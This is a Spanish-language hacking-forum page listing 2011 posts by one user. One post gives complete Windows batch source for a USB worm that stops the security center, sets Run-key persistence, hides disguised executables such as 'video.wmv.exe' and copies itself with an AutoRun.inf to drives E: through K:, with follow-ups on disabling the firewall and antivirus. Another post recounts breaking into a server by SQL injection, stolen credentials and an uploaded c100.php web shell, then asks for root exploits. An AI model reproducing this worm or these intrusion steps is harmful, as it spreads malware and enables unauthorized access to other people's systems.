últimos mensajes de: morty2 - Página 1

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

5 Mayo 2024, 07:15 am

Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)

Mostrar Mensajes
Páginas: [1] 2

1	Seguridad Informática / Bugs y Exploits / Re: ayuda escalada de privilegios!!!	en: 12 Octubre 2011, 21:40 pm
el mmap lo usa uno de los exploits que probe, pero ninguno de los que e encontrado da resultados!!

2	Seguridad Informática / Bugs y Exploits / Re: ayuda escalada de privilegios!!!	en: 12 Octubre 2011, 13:34 pm
gracias amigo!! e leido un poco mas sobre exploits y e encontrado alguno, lo malo es que no tengo acceso a gcc en el servidor para compilarlos!! pense en montar una virtual kon el mismo kernel, compilar ahi el exploit y subirselo al servidor!! otros que encontre compilados me dice que no tengo acceso a mmap. ideas?

3	Seguridad Informática / Bugs y Exploits / ayuda escalada de privilegios!!!	en: 22 Septiembre 2011, 06:48 am
hola amigos de foro elhacker!!!! la cosa es que tengo una shell c100.php, pero tengo permisos de usuario y necesito escalar privilegios para conseguir root. La cosa es que dentro del servidor, hay unos archivos que son mios y que el webmaster no me quiere devolver!!! asique me decidí a mirar a ver si los podria recuperar por mi cuenta. mediante una injeccion sql, saque los datos de user y pass del webmaster y con el upload le subi la shell, el problema es que al retrocedes en el servidor, no me deja acceder a gran parte, pues necesitaria ser root. datos del servidor: Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux-------------------------------------- 2.6.18-028stab092.1 #1 SMP Wed Jul 20 19:47:12 MSD 2011 x86_64 uid=48(apache) gid=48(apache) groups=48(apache),505(psaserv) Safe-mode: OFF (not secure) he leido algo de un exploit para escalada de privilegios en kernel en la version 2.6 pero en los exploits soy nulo totalmente, no se compilarlos y no se programacion!!!!! si alguien sabe como ayudarme se lo agradeceria muchisimo. espero vuestras respuestas pronto!! un saludo y gracias de antemano!!

4	Seguridad Informática / Análisis y Diseño de Malware / Re: Mi nuevo propagador, por usb!!	en: 8 Enero 2011, 13:05 pm
gracias a todos por vuestros comentarios y ayuda!!! No tengo intencion alguna de pasarme al lado oscuro!!!jejeje... Solo me interesa aprender y saber si puedo o no conseguir algo, sin necesidad de hacer el mal. Ando intentando aprender un poco de c++ pero estoy muy pero que muy verde aún. De todas maneras agradezco a todo el mundo su apoyo. Cita de: CL1O en 6 Enero 2011, 01:59 am A ver,,, mmm como te explico, vos dijistes estoy empezando, y como estas empezando, que no se te haga maña hacer estas cosas sha que te vas a comer el cartel que sho no puse para ofender.. Veo que invertiste tiempo y trabajo en esto, y lo felicito esta muy bien, pero hay gente que se mete en eso y no sale mas, después lo único que hacen es hacer cosas así que quizá no se vean bien. Que se sho mira usa eso que sabes o que quieres saber en algo constructivo, no es que nunca haya hecho algo de esto pero bueno.. SAludos y disculpa... acepto y pido tambien disculpas si te ofendi!! todo lo que hago es afan de aprender, el saber no ocupa lugar pero se invierte mucho tiempo. Salu2 morty2

5	Seguridad Informática / Análisis y Diseño de Malware / Re: Mi nuevo propagador, por usb!!	en: 5 Enero 2011, 19:44 pm
Cita de: Arcano. en 5 Enero 2011, 19:31 pm Buenas, Si piensas continuar el código y tu intención es parar el antivirus, sí. Así no avisará el sistema, pero... Tal cual está, "a tu propagador" le da un poquito igual "El centro de seguridad". Y "El centro de seguridad" tampoco te va a controlar si se copia un fichero. Supongo que tu idea es: (1) Acceder al sistema. (2) Propagarte por USB. Para ello: Deberías parar el Firewall para acceder, parar el centro de seguridad, el antivirus, y empezar a escribir... Y... Lo más importante, ¿cómo accederías al sistema?. Nada, el código, como está... Es un buen principio. Pero no le veo utilidad a parar el Centro de Seguridad. De todas formas, existe gente por el foro que sabe mucho más de estos temas. A ver si te cuentan algo. Saludos! Mi idea es seguir con el code para desctivar el Av. Pero tengo que averiguar como hacerlo

6	Seguridad Informática / Análisis y Diseño de Malware / Re: Mi nuevo propagador, por usb!!	en: 5 Enero 2011, 19:23 pm
Cita de: Arcano. en 5 Enero 2011, 19:20 pm Buenas morty2, Sólo una pregunta, ¿para qué paras el centro de seguridad?. Con eso, evitarás el mensajito de "No tiene antivirus, no está activo el Firewall, no están activas las actualizaciones automáticas", pero... ¿De qué te servirá?. ¿No será mejor que detengas el Firewall de Windows XP? Ya que de lo contrario, no podrás acceder al equipo. Para empezar... Es un buen principio. Espero que tu curiosidad no te empuje "al lado oscuro"... Saludos. tu lo has dicho!!!para evitar cartelitos, para hacerlo mas oculto a la vista, pensé que seria bueno n? como detengo el firewall?? salu2 morty2

7	Seguridad Informática / Análisis y Diseño de Malware / Re: Mi nuevo propagador, por usb!!	en: 5 Enero 2011, 19:08 pm
Cita de: 4ng3r en 5 Enero 2011, 19:02 pm Yo creo q este espacio no es para ofender y atacarnos es para compartir ideas y expresarlas libremente, la propuesta de morty2 es interesante y me gustaría probarla haber que tal !!! gracias 4ng3r!!

8	Seguridad Informática / Análisis y Diseño de Malware / Re: Mi nuevo propagador, por usb!!	en: 5 Enero 2011, 18:57 pm
Cita de: CL1O en 5 Enero 2011, 18:35 pm Interesante.. Para que funciona, el LAMER.exe? SAludos no entiendo porque me llamas lamer, he dicho que estoy empezando y esto no es mas que un batch para propagar por usb. ¿esque tu naciste aprendido?....pues si no es asi, no la tires como si nada que los demas tambien sabemos tirarla.................."Renault CL1O" Salu2

9	Seguridad Informática / Análisis y Diseño de Malware / Mi nuevo propagador, por usb!!	en: 5 Enero 2011, 18:30 pm
hola amigos.... a ver que os parece!! @echo off #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô net stop "Centro de seguridad" reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ping -n 8 localhost > nul attrib -s -r -h video.wmv.exe copy /y "video.wmv.exe" "%windir%\video.wmv.exe if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe attrib -s -r -h junto.exe copy /y "junto.exe" "%windir%\junto.exe attrib -s -r -h prop.exe copy /y "prop.exe" "%windir%\prop.exe attrib +s +r +h video.wmv.exe attrib +s +r +h prop.exe attrib +s +r +h junto.exe :bucle call :copiausb :copiausb if exist E: call :creausb E if exist F: call :creausb F if exist G: call :creausb G if exist H: call :creausb H if exist I: call :creausb I if exist J: call :creausb J if exist K: call :creausb K ping -n 8 localhost > nul goto bucle goto :eof :creausb copy /y "%windir%\junto.exe" "%1:\junto.exe" attrib +s +r +h %1:\junto.exe echo [Autorun] > %windir%\AutoRun.inf echo open="junto.exe" >> %windir%\AutoRun.inf echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf echo shellexecute="junto.exe" >> %windir%\AutoRun.inf echo UseAutoPlay=1 >> %windir%\AutoRun.inf echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" attrib +h +s +r "%1:\AutoRun.inf" goto :eof el video.wmv.exe es el server con eliminación en inicio junto.exe es el server y el propagador(prop.exe) conpactados en un .exe no lo he provado en vista ni en win 7 pero en xp me funciona. no seais malos con las criticas que estoy empezando!! saludos!!! morty2

10	Seguridad Informática / Análisis y Diseño de Malware / Re: extraño autorun	en: 1 Enero 2011, 20:30 pm
Esta ocultado con el comando attrib de msdos, por eso no se veía ni aun poniendo que se muestren los archivos ocultos. Eso lo e solucionado, incluso había creado claves de registro el cabr..., jeje..

Páginas: [1] 2

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines